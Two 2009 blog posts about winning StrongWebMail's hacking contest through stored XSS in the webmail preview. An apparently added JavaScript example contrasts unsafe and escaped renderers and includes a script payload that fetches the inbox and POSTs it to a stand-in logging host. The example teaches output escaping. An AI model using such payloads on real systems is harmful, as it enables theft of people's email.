Skeptikal.org

Tuesday, June 9, 2009

Strongwebmail Contest Won

StrongWebMail announced yesterday that we officially won their $10k contest. Surprisingly, they don't appear to have learned from this last round of bad publicity and intend to launch another contest, once they've patched some holes and tightened the rules.

Assuming that the new rules aren't ridiculously restrictive, I'll probably participate in the next round; I've still got a few tricks up my sleeve. However, I must say I feel a bit dirty for feeding this publicity machine. These hacking contests, frankly, are a joke. If nobody gets in, marketing will hail their product as unbreakable. If somebody does get in, they call foul for breaking the rules. While some structure is necessary for any organized contest, the whole point of hacking is finding ways to bend rules and manipulate the system.

StrongWebMail's press release said "It is important to note that the frontend protection offered by StrongWebmail.com was not compromised. In fact, Lance and his team were forced to find a way around the phone authentication." That's not entirely true; we simply took the easiest route. With the webmail app riddled with holes, we saw no point in bothering with the front end. Considering it took us less than a minute from registration to find the hole we used to compromise the app, can you blame us?

I understand that StrongWebMail was created to demonstrate Telesign's 2-factor authentication system, but this is a perfect demonstration that security needs to be addressed holistically. When you claim to have "The Most Secure Email Accounts on the Planet", nobody cares that it's the third party app that is vulnerable- they care about the fact that the email accounts are indeed vulnerable.

The exploit that we used to break in involved an XSS hole in the email preview feature. We sent a message to the CEO's email account, and when viewed, his web browser made several AJAX requests to the server, slurping the contents of his inbox and then depositing it on a logging script under our control. Lance did an interview in which he discussed the details of the exploit further, and I recommend you read that for more details.

Finally, I want to give another big thanks to Lance James and Aviv Raff for working on this with me. Not only was it very fun, but it made some very good points (that will likely be forgotten soon) about web application security: Escape outputs, be careful with what third-party software you use, and don't taunt the hackers.
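To make the "escape outputs" lesson concrete, here is an added example (mine, not StrongWebMail's code or the actual exploit) of the class of bug described above: a webmail preview that interpolates a sender-controlled message body straight into the inbox markup, beside the same renderer with output escaping. The message, the `/inbox` endpoint and the logging URL are constructed for illustration; the real payload and endpoints are not disclosed in the post.

```javascript
// Added example, not StrongWebMail's code: how a webmail "preview" feature
// becomes a stored-XSS sink, and the output-escaping fix. The message,
// endpoint names and the logging URL below are constructed for illustration.

const PREVIEW_LEN = 200; // characters of body shown in the inbox listing (assumed)

// Escape the five HTML metacharacters so untrusted text is rendered as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the sender-controlled body (and sender address) is interpolated
// straight into markup. A <script>, or an onerror handler on an <img>, in the
// message runs in the recipient's session as soon as the inbox is rendered.
function renderPreviewUnsafe(msg) {
  const snippet = msg.body.slice(0, PREVIEW_LEN);
  return `<div class="preview"><b>${msg.from}</b>: ${snippet}</div>`;
}

// Hardened: truncate the plain text first, then escape on output, so no
// entity is cut in half and every metacharacter reaches the page inert.
// Every field that a sender controls is escaped, not just the body. If rich
// previews are a requirement, an allow-list HTML sanitizer replaces this,
// never a blacklist of "dangerous" tags.
function renderPreviewSafe(msg) {
  const snippet = msg.body.slice(0, PREVIEW_LEN);
  return `<div class="preview"><b>${escapeHtml(msg.from)}</b>: ${escapeHtml(snippet)}</div>`;
}

// Constructed message in the shape the post describes: script in the body
// that, if it ran, would fetch the victim's inbox with the victim's own
// session cookies and POST the result to a logger the attacker controls.
const constructedMessage = {
  from: 'sender@example.com',
  body: 'hi <script>fetch("/inbox").then(r=>r.text())' +
        '.then(t=>fetch("https://logger.example/collect",{method:"POST",body:t}))</script>',
};

// True when the rendered HTML still carries a live script element or an
// inline event handler attribute; used to compare the two renderers.
function hasActiveMarkup(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}
```

Running `renderPreviewUnsafe(constructedMessage)` yields markup containing a live `<script>` element; `renderPreviewSafe` yields the same text with `&lt;script&gt;` in its place, which the browser displays rather than executes. Escaping at the output boundary is the fix; stripping "bad" tags on input is not, because the same stored body is usually rendered in more than one place.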


Friday, June 5, 2009

The StrongWebMail Incident

In case you've been living under a rock, Lance James, Aviv Raff, and I took up StrongWebMail's challenge to break into their CEO's webmail and claim a $10,000 prize. The terms of the contest preclude us from disclosing the details of the exploit, and while they've partially patched the holes that caused it, I'm not sure we're ever going to be allowed to tell the whole story.

Rest assured, we will openly disclose as much as we can, as soon as we can. In fact, I already have a blog post written and ready to go live. It will be published early next week at the latest, so stay tuned.

The current status: StrongWebMail's CEO confirmed that we exploited the application. They still have not confirmed that we won the prize, and are checking to make sure we complied with the contest rules. I'm confident we did. They gave themselves 3 business days (from yesterday, when we submitted the golden ticket) to confirm the win.

A few news reports about the incident implied that we may not qualify because social engineering is off limits. I can't make comments regarding the extent to which we used social engineering, but the rules say nothing about it, only that "working with an employee of StrongWebmail.com or one of its affiliates or partners to complete the hack" is not allowed.
